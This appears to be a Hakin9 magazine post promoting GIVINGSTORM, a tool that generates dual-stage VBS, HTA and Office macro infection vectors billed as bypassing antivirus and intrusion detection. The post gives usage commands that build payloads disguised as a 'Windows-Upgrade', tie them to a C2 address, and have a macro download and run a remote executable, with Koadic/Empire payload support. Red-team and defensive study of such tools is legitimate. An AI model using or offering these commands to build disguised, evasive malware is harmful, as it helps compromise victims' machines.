GIVINGSTORM - Infection vector that bypasses AV, IDS, and IPS. (For now...)

(23 views)

The beginnings of a C2 framework. Currently without all the C2 stuff so far. Generates a dual-stage VBS infection vector, and a dual-stage HTA infection vector. The variables take into account C2 addresses, Koadic/Empire payloads, and a few delivery mechanisms. The payload files are output to an aptly named directory "Payloads" that is created if not already present.

Installation & Usage

GIVINGSTORM is a breeze to use. Simply clone the directory, and cd into it.

For the HTA payload: python3 GIVINGSTORM.py -n Windows-Upgrade -p b64encodedpayload -c amazon.com/c2/domain

HTA Example

alt text

For the Macro Subroutine: python3 GIVINGSTORM.py -n Windows-Upgrade -e amazon.com/final/payload.exe

Macro Example

alt text

More: https://github.com/nins3i/GIVINGSTORM

July 13, 2020

Author

Hakin9 TEAM
Hakin9 is a monthly magazine dedicated to hacking and cybersecurity. In every edition, we try to focus on different approaches to show various techniques - defensive and offensive. This knowledge will help you understand how most popular attacks are performed and how to protect your data from them. Our tutorials, case studies and online courses will prepare you for the upcoming, potential threats in the cyber security world. We collaborate with many individuals and universities and public institutions, but also with companies such as Xento Systems, CATO Networks, EY, CIPHER Intelligence LAB, redBorder, TSG, and others.
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023